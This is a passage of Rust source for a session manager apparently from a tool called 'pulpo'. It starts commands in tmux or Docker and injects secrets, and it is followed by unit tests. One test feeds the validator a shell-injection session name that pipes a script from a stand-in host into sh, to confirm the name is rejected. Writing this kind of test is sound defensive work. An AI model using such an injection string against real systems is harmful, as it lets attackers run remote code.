use std::collections::HashMap;
use std::sync::Arc;
use anyhow::{Result, anyhow, bail};
use chrono::Utc;
use pulpo_common::api::CreateSessionRequest;
use pulpo_common::event::{PulpoEvent, SessionDeletedEvent, SessionEvent};
use pulpo_common::session::{Runtime, Session, SessionStatus, meta};
use std::sync::RwLock;
use tokio::sync::broadcast;
use uuid::Uuid;
use crate::backend::Backend;
use crate::config::InkConfig;
#[cfg(not(coverage))]
use crate::session::utils::create_worktree;
use crate::session::utils::{
validate_session_name, validate_workdir, wrap_command, write_secrets_file,
};
use crate::store::Store;
pub(crate) use crate::session::utils::cleanup_worktree;
#[cfg(test)]
#[allow(unused_imports)]
pub(crate) use crate::session::utils::{is_shell_command, wrap_command_for_test};
#[derive(Clone)]
pub struct SessionManager {
backend: Arc<dyn Backend>,
docker_backend: Option<Arc<dyn Backend>>,
store: Store,
inks: Arc<RwLock<HashMap<String, InkConfig>>>,
default_command: Option<String>,
event_tx: Option<broadcast::Sender<PulpoEvent>>,
node_name: String,
stale_grace_secs: i64,
}
struct ResolvedInk {
command: String,
description: Option<String>,
secrets: Vec<String>,
runtime: Option<Runtime>,
}
struct SessionCreatePlan {
session: Session,
backend_id: String,
effective_workdir: String,
final_command: String,
secrets_file: Option<String>,
}
impl SessionManager {
pub fn new(
backend: Arc<dyn Backend>,
store: Store,
inks: HashMap<String, InkConfig>,
default_command: Option<String>,
) -> Self {
Self {
backend,
docker_backend: None,
store,
inks: Arc::new(RwLock::new(inks)),
default_command,
event_tx: None,
node_name: String::new(),
stale_grace_secs: 5,
}
}
#[must_use]
pub fn with_docker_backend(mut self, backend: Arc<dyn Backend>) -> Self {
self.docker_backend = Some(backend);
self
}
fn backend_for_id(&self, backend_id: &str) -> &Arc<dyn Backend> {
if crate::backend::docker::is_docker_session(backend_id) {
self.docker_backend.as_ref().unwrap_or(&self.backend)
} else {
&self.backend
}
}
#[cfg(test)]
#[must_use]
pub const fn with_no_stale_grace(mut self) -> Self {
self.stale_grace_secs = 0;
self
}
#[must_use]
pub fn with_event_tx(mut self, tx: broadcast::Sender<PulpoEvent>, node_name: String) -> Self {
self.event_tx = Some(tx);
self.node_name = node_name;
self
}
pub fn inks(&self) -> HashMap<String, InkConfig> {
self.inks.read().expect("inks lock poisoned").clone()
}
pub fn set_inks(&self, inks: HashMap<String, InkConfig>) {
*self.inks.write().expect("inks lock poisoned") = inks;
}
pub fn backend(&self) -> Arc<dyn Backend> {
self.backend.clone()
}
fn emit_event(&self, session: &Session, previous_status: Option<SessionStatus>) {
if let Some(tx) = &self.event_tx {
let pr_url = session.meta_str(meta::PR_URL).map(str::to_owned);
let error_status = session.meta_str(meta::ERROR_STATUS).map(str::to_owned);
let event = SessionEvent {
session_id: session.id.to_string(),
session_name: session.name.clone(),
status: session.status.to_string(),
previous_status: previous_status.map(|s| s.to_string()),
node_name: self.node_name.clone(),
output_snippet: session.output_snapshot.clone(),
timestamp: Utc::now().to_rfc3339(),
git_branch: session.git_branch.clone(),
git_commit: session.git_commit.clone(),
git_insertions: session.git_insertions,
git_deletions: session.git_deletions,
git_files_changed: session.git_files_changed,
pr_url,
error_status,
total_input_tokens: session.meta_parsed(meta::TOTAL_INPUT_TOKENS),
total_output_tokens: session.meta_parsed(meta::TOTAL_OUTPUT_TOKENS),
session_cost_usd: session.meta_parsed(meta::SESSION_COST_USD),
};
let _ = tx.send(PulpoEvent::Session(event));
}
}
pub fn resolve_backend_id(&self, session: &Session) -> String {
session
.backend_session_id
.clone()
.unwrap_or_else(|| self.backend.session_id(&session.name))
}
pub async fn create_session(&self, req: CreateSessionRequest) -> Result<Session> {
let mut plan = self.build_create_plan(req).await?;
self.store.insert_session(&plan.session).await?;
let active_backend = self.backend_for_id(&plan.backend_id);
if let Err(error) = active_backend.create_session(
&plan.backend_id,
&plan.effective_workdir,
&plan.final_command,
) {
self.cleanup_failed_create(&plan.session.id, plan.secrets_file.as_deref())
.await?;
return Err(error);
}
self.finalize_created_session(&mut plan.session, &plan.backend_id)
.await?;
Ok(plan.session)
}
async fn build_create_plan(&self, req: CreateSessionRequest) -> Result<SessionCreatePlan> {
validate_session_name(&req.name)?;
let resolved = self.resolve_ink(&req)?;
let command = resolved.command;
let description = resolved.description;
let workdir = req.workdir.unwrap_or_else(|| {
dirs::home_dir().map_or_else(|| "/tmp".to_owned(), |h| h.to_string_lossy().into_owned())
});
let runtime = req.runtime.or(resolved.runtime).unwrap_or_default();
let wants_worktree = req.worktree.unwrap_or(false);
if runtime != Runtime::Docker || wants_worktree {
validate_workdir(&workdir)?;
}
let (effective_workdir, worktree_path, worktree_branch) = if wants_worktree {
#[cfg(not(coverage))]
{
let wt_path = create_worktree(&workdir, &req.name, req.worktree_base.as_deref())?;
(wt_path.clone(), Some(wt_path), Some(req.name.clone()))
}
#[cfg(coverage)]
{
(workdir.clone(), None, None)
}
} else {
(workdir.clone(), None, None)
};
if self.store.has_active_session_by_name(&req.name).await? {
bail!(
"a session named '{}' is already active — stop it first or use a different name",
req.name
);
}
let mut all_secret_names = resolved.secrets;
if let Some(ref req_secrets) = req.secrets {
for s in req_secrets {
if !all_secret_names.contains(s) {
all_secret_names.push(s.clone());
}
}
}
let secrets_env = if all_secret_names.is_empty() {
HashMap::new()
} else {
self.store
.get_secrets_for_injection(&all_secret_names)
.await?
};
let id = Uuid::new_v4();
let name = req.name.clone();
let backend_id = if runtime == Runtime::Docker {
if self.docker_backend.is_none() {
bail!("docker runtime not configured — set [docker] image in config.toml");
}
format!("docker:pulpo-{}", req.name)
} else {
self.backend.session_id(&name)
};
let secrets_file = if runtime != Runtime::Docker && !secrets_env.is_empty() {
write_secrets_file(&id, &secrets_env, self.store.data_dir())?
} else {
None
};
let final_command = if runtime == Runtime::Docker {
command.clone()
} else {
wrap_command(&command, &id, &name, secrets_file.as_deref())
};
let now = Utc::now();
let session = Session {
id,
name,
workdir: workdir.clone(),
command,
description,
backend_session_id: Some(backend_id.clone()),
metadata: req.metadata,
ink: req.ink,
idle_threshold_secs: req.idle_threshold_secs,
worktree_path,
worktree_branch,
runtime,
created_at: now,
updated_at: now,
..Default::default()
};
Ok(SessionCreatePlan {
session,
backend_id,
effective_workdir,
final_command,
secrets_file,
})
}
async fn cleanup_failed_create(
&self,
session_id: &Uuid,
secrets_file: Option<&str>,
) -> Result<()> {
if let Some(secrets_file) = secrets_file {
let _ = std::fs::remove_file(secrets_file);
}
self.store
.update_session_status(&session_id.to_string(), SessionStatus::Stopped)
.await?;
Ok(())
}
async fn finalize_created_session(
&self,
session: &mut Session,
backend_id: &str,
) -> Result<()> {
let runtime = session.runtime;
let id = session.id;
let name = session.name.clone();
let active_backend = self.backend_for_id(backend_id);
if runtime == Runtime::Tmux
&& let Ok(tmux_id) = self.backend.query_backend_id(&name)
{
let _ = self
.store
.update_backend_session_id(&id.to_string(), &tmux_id)
.await;
session.backend_session_id = Some(tmux_id);
}
self.store
.update_session_status(&id.to_string(), SessionStatus::Active)
.await?;
let log_dir = format!("{}/logs", self.store.data_dir());
let _ = std::fs::create_dir_all(&log_dir);
let log_path = format!("{log_dir}/{id}.log");
let _ = active_backend.setup_logging(backend_id, &log_path);
#[cfg(not(coverage))]
if let Some(auth_info) = crate::auth_info::detect_auth_for_command(&session.command) {
let sid = id.to_string();
let mut updates = vec![(meta::AUTH_PROVIDER, auth_info.provider.as_str())];
if let Some(ref plan) = auth_info.plan {
updates.push((meta::AUTH_PLAN, plan.as_str()));
}
if let Some(ref email) = auth_info.email {
updates.push((meta::AUTH_EMAIL, email.as_str()));
}
let _ = self
.store
.batch_update_session_metadata(&sid, &updates, &[])
.await;
if let Ok(Some(refreshed)) = self.store.get_session(&sid).await {
session.metadata = refreshed.metadata;
}
}
session.status = SessionStatus::Active;
session.updated_at = Utc::now();
self.emit_event(session, Some(SessionStatus::Creating));
Ok(())
}
fn recreate_backend_session(
session: &Session,
active_backend: &Arc<dyn crate::backend::Backend>,
effective_workdir: &str,
create_id: &str,
) -> Result<()> {
let final_command = if session.runtime == Runtime::Docker {
session.command.clone()
} else {
wrap_command(&session.command, &session.id, &session.name, None)
};
active_backend.create_session(create_id, effective_workdir, &final_command)
}
async fn refresh_backend_session_id(&self, session: &Session) {
if session.runtime == Runtime::Tmux
&& let Ok(tmux_id) = self.backend.query_backend_id(&session.name)
{
let _ = self
.store
.update_backend_session_id(&session.id.to_string(), &tmux_id)
.await;
}
}
async fn mark_session_status(
&self,
session: &mut Session,
previous_status: SessionStatus,
next_status: SessionStatus,
) -> Result<()> {
self.store
.update_session_status(&session.id.to_string(), next_status)
.await?;
session.status = next_status;
session.updated_at = Utc::now();
self.emit_event(session, Some(previous_status));
Ok(())
}
async fn mark_stale_in_sessions(&self, sessions: &mut [Session]) {
for session in sessions {
let _ = self.check_and_mark_stale(session).await;
}
}
fn effective_resume_workdir(session: &Session) -> String {
session
.worktree_path
.as_ref()
.filter(|p| std::path::Path::new(p).exists())
.cloned()
.unwrap_or_else(|| session.workdir.clone())
}
fn resume_create_id(
&self,
session: &Session,
backend_id: &str,
prefer_name_for_tmux: bool,
) -> String {
if session.runtime == Runtime::Docker || !prefer_name_for_tmux {
backend_id.to_owned()
} else {
self.backend.session_id(&session.name)
}
}
async fn restore_session_backend(
&self,
session: &Session,
active_backend: &Arc<dyn crate::backend::Backend>,
effective_workdir: &str,
create_id: &str,
) -> Result<()> {
Self::recreate_backend_session(session, active_backend, effective_workdir, create_id)?;
self.refresh_backend_session_id(session).await;
Ok(())
}
fn stop_session_backend(
&self,
session: &Session,
backend_id: &str,
backend: &Arc<dyn crate::backend::Backend>,
) -> Result<()> {
if let Err(error) = backend.kill_session(backend_id) {
let name_id = self.backend.session_id(&session.name);
if name_id != backend_id && backend.kill_session(&name_id).is_ok() {
tracing::info!(
session = %session.name,
"Killed session by name after stale backend ID failed"
);
return Ok(());
}
if matches!(
session.status,
SessionStatus::Lost | SessionStatus::Stopped | SessionStatus::Ready
) {
tracing::debug!(
session = %session.name,
error = %error,
"Ignoring kill error for {status} session",
status = session.status
);
return Ok(());
}
bail!("failed to stop session: {error}");
}
Ok(())
}
async fn mark_session_stopped(&self, session: &mut Session) -> Result<()> {
let previous = session.status;
self.store
.update_session_status(&session.id.to_string(), SessionStatus::Stopped)
.await?;
session.status = SessionStatus::Stopped;
self.emit_event(session, Some(previous));
Ok(())
}
async fn purge_session(&self, session: &Session) -> Result<()> {
let session_id = session.id.to_string();
if let Some(ref wt_path) = session.worktree_path {
tracing::info!(
session = %session.name,
path = %wt_path,
"Cleaning up worktree after purge"
);
cleanup_worktree(wt_path, &session.workdir);
}
self.store.delete_session(&session_id).await?;
self.emit_session_deleted(session);
Ok(())
}
fn emit_session_deleted(&self, session: &Session) {
if let Some(tx) = &self.event_tx {
let _ = tx.send(PulpoEvent::SessionDeleted(SessionDeletedEvent {
session_id: session.id.to_string(),
session_name: session.name.clone(),
node_name: self.node_name.clone(),
timestamp: Utc::now().to_rfc3339(),
}));
}
}
fn resolve_ink(&self, req: &CreateSessionRequest) -> Result<ResolvedInk> {
let mut ink_secrets: Vec<String> = Vec::new();
let mut ink_runtime: Option<Runtime> = None;
if let Some(ref ink_name) = req.ink {
let ink = self
.inks
.read()
.expect("inks lock poisoned")
.get(ink_name)
.cloned()
.ok_or_else(|| anyhow!("unknown ink: {ink_name}"))?;
ink_secrets.clone_from(&ink.secrets);
ink_runtime = ink.runtime.as_deref().and_then(|r| r.parse().ok());
if req.command.is_none() {
let command = ink.command.clone().unwrap_or_default();
let description = req.description.clone().or(ink.description);
if !command.is_empty() {
return Ok(ResolvedInk {
command,
description,
secrets: ink_secrets,
runtime: ink_runtime,
});
}
}
}
if let Some(ref cmd) = req.command {
return Ok(ResolvedInk {
command: cmd.clone(),
description: req.description.clone(),
secrets: ink_secrets,
runtime: ink_runtime,
});
}
if let Some(ref default_cmd) = self.default_command {
return Ok(ResolvedInk {
command: default_cmd.clone(),
description: req.description.clone(),
secrets: ink_secrets,
runtime: ink_runtime,
});
}
let shell = std::env::var("SHELL").unwrap_or_else(|_| "/bin/sh".to_owned());
Ok(ResolvedInk {
command: shell,
description: req.description.clone(),
secrets: ink_secrets,
runtime: ink_runtime,
})
}
pub async fn get_session(&self, id: &str) -> Result<Option<Session>> {
let session = self.store.get_session(id).await?;
match session {
Some(mut s) => {
if self.check_and_mark_stale(&mut s).await? {
self.emit_event(&s, Some(SessionStatus::Active));
}
Ok(Some(s))
}
None => Ok(None),
}
}
pub async fn list_sessions(&self) -> Result<Vec<Session>> {
let mut sessions = self.store.list_sessions().await?;
self.mark_stale_in_sessions(&mut sessions).await;
Ok(sessions)
}
pub async fn list_sessions_filtered(
&self,
query: &pulpo_common::api::ListSessionsQuery,
) -> Result<Vec<Session>> {
let mut sessions = self.store.list_sessions_filtered(query).await?;
self.mark_stale_in_sessions(&mut sessions).await;
Ok(sessions)
}
async fn check_and_mark_stale(&self, session: &mut Session) -> Result<bool> {
if session.status != SessionStatus::Active && session.status != SessionStatus::Idle {
return Ok(false);
}
let age = Utc::now() - session.created_at;
if age.num_seconds() < self.stale_grace_secs {
return Ok(false);
}
let backend_id = self.resolve_backend_id(session);
let alive = self.backend_for_id(&backend_id).is_alive(&backend_id)?;
if alive {
return Ok(false);
}
self.store
.update_session_status(&session.id.to_string(), SessionStatus::Lost)
.await?;
session.status = SessionStatus::Lost;
Ok(true)
}
pub async fn stop_session(&self, id: &str, purge: bool) -> Result<()> {
let mut session = self
.store
.get_session(id)
.await?
.ok_or_else(|| anyhow!("session not found: {id}"))?;
let backend_id = self.resolve_backend_id(&session);
let backend = self.backend_for_id(&backend_id);
self.stop_session_backend(&session, &backend_id, backend)?;
self.mark_session_stopped(&mut session).await?;
if purge {
self.purge_session(&session).await?;
}
Ok(())
}
pub fn capture_output(&self, id: &str, backend_id: &str, lines: usize) -> String {
self.backend
.capture_output(backend_id, lines)
.unwrap_or_else(|_| self.read_log_tail(id, lines))
}
fn read_log_tail(&self, id: &str, lines: usize) -> String {
let log_path = format!("{}/logs/{id}.log", self.store.data_dir());
let content = std::fs::read_to_string(&log_path).unwrap_or_default();
let mut tail: Vec<&str> = content.lines().rev().take(lines).collect();
tail.reverse();
tail.join("\n")
}
pub fn send_input(&self, backend_id: &str, text: &str) -> Result<()> {
self.backend.send_input(backend_id, text)
}
pub async fn resume_session(&self, id: &str) -> Result<Session> {
let session = self
.store
.get_session(id)
.await?
.ok_or_else(|| anyhow!("session not found: {id}"))?;
let previous_status = session.status;
if previous_status != SessionStatus::Lost && previous_status != SessionStatus::Ready {
bail!("session cannot be resumed (status: {previous_status})");
}
if self
.store
.has_active_session_by_name_excluding(&session.name, Some(&session.id.to_string()))
.await?
{
bail!(
"another session named '{}' is already active — stop it first before resuming",
session.name
);
}
let effective_workdir = Self::effective_resume_workdir(&session);
if session.runtime != Runtime::Docker {
validate_workdir(&effective_workdir)?;
}
let backend_id = self.resolve_backend_id(&session);
let active_backend = self.backend_for_id(&backend_id);
let alive = active_backend.is_alive(&backend_id)?;
if !alive {
let create_id = self.resume_create_id(&session, &backend_id, true);
self.restore_session_backend(&session, active_backend, &effective_workdir, &create_id)
.await?;
}
let mut session = session;
self.mark_session_status(&mut session, previous_status, SessionStatus::Active)
.await?;
Ok(session)
}
pub async fn resume_lost_sessions(&self) -> Result<usize> {
let sessions = self.store.list_sessions().await?;
let mut resumed = 0;
for session in sessions {
if session.status != SessionStatus::Active && session.status != SessionStatus::Idle {
continue;
}
let backend_id = self.resolve_backend_id(&session);
let active_backend = self.backend_for_id(&backend_id);
let alive = active_backend.is_alive(&backend_id).unwrap_or(false);
if alive {
continue;
}
let create_id = self.resume_create_id(&session, &backend_id, false);
if let Err(e) = self
.restore_session_backend(&session, active_backend, &session.workdir, &create_id)
.await
{
tracing::warn!(
session = %session.name,
error = %e,
"Failed to auto-resume session on startup"
);
self.store
.update_session_status(&session.id.to_string(), SessionStatus::Lost)
.await?;
continue;
}
self.store
.update_session_status(&session.id.to_string(), SessionStatus::Active)
.await?;
tracing::info!(session = %session.name, "Auto-resumed session after restart");
resumed += 1;
}
Ok(resumed)
}
pub const fn store(&self) -> &Store {
&self.store
}
}
#[cfg(test)]
mod tests {
use super::*;
use pulpo_common::event::SessionEvent;
use std::sync::Mutex;
fn unwrap_session_event(event: PulpoEvent) -> SessionEvent {
match event {
PulpoEvent::Session(se) => se,
PulpoEvent::SessionDeleted(_) => panic!("expected session event"),
}
}
struct MockBackend {
create_result: Mutex<Result<()>>,
kill_result: Mutex<Result<()>>,
alive: Mutex<bool>,
captured_output: Mutex<String>,
calls: Mutex<Vec<String>>,
}
impl MockBackend {
fn new() -> Self {
Self {
create_result: Mutex::new(Ok(())),
kill_result: Mutex::new(Ok(())),
alive: Mutex::new(true),
captured_output: Mutex::new("test output".into()),
calls: Mutex::new(vec![]),
}
}
fn with_create_error(self) -> Self {
*self.create_result.lock().unwrap() = Err(anyhow!("backend not found"));
self
}
fn with_kill_error(self) -> Self {
*self.kill_result.lock().unwrap() = Err(anyhow!("kill failed"));
self
}
fn with_alive(self, alive: bool) -> Self {
*self.alive.lock().unwrap() = alive;
self
}
}
impl Backend for MockBackend {
fn create_session(&self, name: &str, working_dir: &str, command: &str) -> Result<()> {
self.calls
.lock()
.unwrap()
.push(format!("create:{name}:{working_dir}:{command}"));
let mut result = self.create_result.lock().unwrap();
std::mem::replace(&mut *result, Ok(()))
}
fn kill_session(&self, name: &str) -> Result<()> {
self.calls.lock().unwrap().push(format!("kill:{name}"));
let mut result = self.kill_result.lock().unwrap();
std::mem::replace(&mut *result, Ok(()))
}
fn is_alive(&self, name: &str) -> Result<bool> {
self.calls.lock().unwrap().push(format!("is_alive:{name}"));
Ok(*self.alive.lock().unwrap())
}
fn capture_output(&self, name: &str, lines: usize) -> Result<String> {
self.calls
.lock()
.unwrap()
.push(format!("capture:{name}:{lines}"));
Ok(self.captured_output.lock().unwrap().clone())
}
fn send_input(&self, name: &str, text: &str) -> Result<()> {
self.calls
.lock()
.unwrap()
.push(format!("send_input:{name}:{text}"));
Ok(())
}
fn setup_logging(&self, name: &str, log_path: &str) -> Result<()> {
self.calls
.lock()
.unwrap()
.push(format!("setup_logging:{name}:{log_path}"));
Ok(())
}
fn query_backend_id(&self, name: &str) -> anyhow::Result<String> {
Ok(format!("${}", name.len()))
}
fn list_sessions(&self) -> anyhow::Result<Vec<(String, String)>> {
Ok(Vec::new())
}
}
struct FailCapture;
impl Backend for FailCapture {
fn create_session(&self, _: &str, _: &str, _: &str) -> Result<()> {
Ok(())
}
fn kill_session(&self, _: &str) -> Result<()> {
Ok(())
}
fn is_alive(&self, _: &str) -> Result<bool> {
Ok(true)
}
fn capture_output(&self, _: &str, _: usize) -> Result<String> {
Err(anyhow!("session not alive"))
}
fn send_input(&self, _: &str, _: &str) -> Result<()> {
Ok(())
}
fn setup_logging(&self, _: &str, _: &str) -> Result<()> {
Ok(())
}
}
async fn test_manager(
backend: MockBackend,
) -> (SessionManager, Arc<MockBackend>, sqlx::SqlitePool) {
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let pool = store.pool().clone();
let backend = Arc::new(backend);
let manager =
SessionManager::new(backend.clone(), store, HashMap::new(), None).with_no_stale_grace();
(manager, backend, pool)
}
fn make_req(name: &str) -> CreateSessionRequest {
CreateSessionRequest {
name: name.to_owned(),
workdir: Some("/tmp".into()),
command: Some("echo hello".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
}
}
#[tokio::test]
async fn test_create_session_defaults() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("fix-the-bug")).await.unwrap();
assert_eq!(session.name, "fix-the-bug");
assert_eq!(session.command, "echo hello");
assert_eq!(session.status, SessionStatus::Active);
assert_eq!(session.workdir, "/tmp");
assert_eq!(session.backend_session_id, Some("$11".into()));
let calls = backend.calls.lock().unwrap();
assert!(calls[0].contains("-l -c"));
assert!(calls[0].contains("echo hello"));
assert!(calls[1].starts_with("setup_logging:fix-the-bug:"));
assert_eq!(calls.len(), 2);
drop(calls);
}
#[tokio::test]
async fn test_create_session_no_command_falls_back_to_shell() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert!(!session.command.is_empty());
let calls = backend.calls.lock().unwrap();
assert!(calls[0].contains("-l -c"));
drop(calls);
}
#[tokio::test]
async fn test_create_session_with_ink() {
let mut inks = HashMap::new();
inks.insert(
"coder".into(),
InkConfig {
description: Some("Coder ink".into()),
command: Some("claude -p 'implement'".into()),
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, inks, None).with_no_stale_grace();
let req = CreateSessionRequest {
name: "ink-test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("coder".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.command, "claude -p 'implement'");
assert_eq!(session.description, Some("Coder ink".into()));
}
#[tokio::test]
async fn test_create_session_command_overrides_ink() {
let mut inks = HashMap::new();
inks.insert(
"coder".into(),
InkConfig {
description: Some("Coder ink".into()),
command: Some("claude -p 'default'".into()),
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, inks, None).with_no_stale_grace();
let req = CreateSessionRequest {
name: "override-test".into(),
workdir: Some("/tmp".into()),
command: Some("my-custom-command".into()),
ink: Some("coder".into()),
description: Some("My desc".into()),
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.command, "my-custom-command");
assert_eq!(session.description, Some("My desc".into()));
}
#[tokio::test]
async fn test_create_session_unknown_ink() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("nonexistent".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let result = mgr.create_session(req).await;
let err = result.unwrap_err().to_string();
assert!(err.contains("unknown ink"), "got: {err}");
}
#[test]
fn test_validate_session_name_valid() {
assert!(validate_session_name("my-session").is_ok());
assert!(validate_session_name("a").is_ok());
assert!(validate_session_name("fix-auth-123").is_ok());
assert!(validate_session_name("nightly-20260331-0300").is_ok());
}
#[test]
fn test_validate_session_name_rejects_shell_injection() {
let result = validate_session_name("x'; curl evil.com | sh; echo '");
assert!(result.is_err());
assert!(result.unwrap_err().to_string().contains("lowercase"));
}
#[test]
fn test_validate_session_name_rejects_special_chars() {
assert!(validate_session_name("").is_err());
assert!(validate_session_name("Has Spaces").is_err());
assert!(validate_session_name("UPPERCASE").is_err());
assert!(validate_session_name("has.dots").is_err());
assert!(validate_session_name("has:colons").is_err());
assert!(validate_session_name("-leading-hyphen").is_err());
assert!(validate_session_name("trailing-hyphen-").is_err());
}
#[test]
fn test_validate_session_name_rejects_long_names() {
let long = "a".repeat(129);
assert!(validate_session_name(&long).is_err());
let ok = "a".repeat(128);
assert!(validate_session_name(&ok).is_ok());
}
#[test]
fn test_wrap_command_escapes_session_name() {
let id = uuid::Uuid::new_v4();
let wrapped = wrap_command("echo test", &id, "safe-name", None);
assert!(wrapped.contains("PULPO_SESSION_NAME=safe-name"));
let wrapped = wrap_command("echo test", &id, "name'inject", None);
assert!(!wrapped.contains("name'inject"));
assert!(wrapped.contains("name'\\''inject"));
}
#[tokio::test]
async fn test_create_session_rejects_invalid_name() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "bad name with spaces".into(),
workdir: Some("/tmp".into()),
command: Some("echo".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let err = mgr.create_session(req).await.unwrap_err().to_string();
assert!(err.contains("lowercase"), "got: {err}");
}
#[tokio::test]
async fn test_create_session_default_workdir() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "defaults-test".into(),
workdir: None,
command: Some("echo test".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert!(!session.workdir.is_empty());
}
#[tokio::test]
async fn test_create_session_calls_setup_logging() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
let _session = mgr.create_session(make_req("test")).await.unwrap();
let calls = backend.calls.lock().unwrap();
assert!(
calls.iter().any(|c| c.starts_with("setup_logging:")),
"Expected setup_logging call, got: {calls:?}"
);
drop(calls);
}
#[tokio::test]
async fn test_create_session_explicit_name() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "custom-name".into(),
..make_req("test")
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.name, "custom-name");
}
#[tokio::test]
async fn test_create_session_workdir_not_found() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
workdir: Some("/nonexistent/path/that/does/not/exist".into()),
..make_req("test")
};
let result = mgr.create_session(req).await;
let err = result.unwrap_err().to_string();
assert!(err.contains("does not exist"), "got: {err}");
}
#[tokio::test]
async fn test_create_session_workdir_is_file() {
let tmp = tempfile::NamedTempFile::new().unwrap();
let path = tmp.path().to_str().unwrap().to_owned();
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
workdir: Some(path),
..make_req("test")
};
let result = mgr.create_session(req).await;
let err = result.unwrap_err().to_string();
assert!(err.contains("not a directory"), "got: {err}");
}
#[tokio::test]
async fn test_create_session_backend_failure() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_create_error()).await;
let result = mgr.create_session(make_req("test")).await;
assert!(result.is_err());
let sessions = mgr.list_sessions().await.unwrap();
assert_eq!(sessions.len(), 1);
assert_eq!(sessions[0].status, SessionStatus::Stopped);
}
#[tokio::test]
async fn test_create_session_backend_failure_cleans_up_secrets_file() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_create_error()).await;
mgr.store()
.set_secret("CLEANUP_TOKEN", "val123")
.await
.unwrap();
let mut req = make_req("cleanup-test");
req.secrets = Some(vec!["CLEANUP_TOKEN".into()]);
let result = mgr.create_session(req).await;
assert!(result.is_err());
let data_dir = mgr.store().data_dir();
let secrets_dir = format!("{data_dir}/secrets");
if std::fs::exists(&secrets_dir).unwrap_or(false) {
let entries: Vec<_> = std::fs::read_dir(&secrets_dir)
.unwrap()
.filter_map(std::result::Result::ok)
.collect();
assert!(
entries.is_empty(),
"secrets file should have been cleaned up, found: {entries:?}"
);
}
}
#[test]
fn test_write_secrets_file_creates_secrets_subdirectory() {
let tmpdir = tempfile::tempdir().unwrap();
let data_dir = tmpdir.path().to_str().unwrap();
let id = uuid::Uuid::new_v4();
let mut secrets = HashMap::new();
secrets.insert("KEY".to_owned(), "val".to_owned());
let path = write_secrets_file(&id, &secrets, data_dir)
.unwrap()
.unwrap();
assert!(path.starts_with(&format!("{data_dir}/secrets/")));
assert!(std::path::Path::new(&path).exists());
}
#[tokio::test]
async fn test_create_session_duplicate_name_rejected() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
mgr.create_session(make_req("dupe")).await.unwrap();
let err = mgr.create_session(make_req("dupe")).await.unwrap_err();
assert!(
err.to_string().contains("already active"),
"expected duplicate name error, got: {err}"
);
}
#[tokio::test]
async fn test_create_session_reuse_name_after_stop() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
mgr.create_session(make_req("reuse")).await.unwrap();
mgr.stop_session("reuse", false).await.unwrap();
mgr.create_session(make_req("reuse")).await.unwrap();
}
#[tokio::test]
async fn test_get_session_alive() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Active);
}
#[tokio::test]
async fn test_get_session_dead_lazy_update() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Lost);
}
#[tokio::test]
async fn test_get_session_idle_with_dead_backend_transitions_to_lost() {
let (mgr, _, _pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
mgr.store()
.update_session_status(&session.id.to_string(), SessionStatus::Idle)
.await
.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
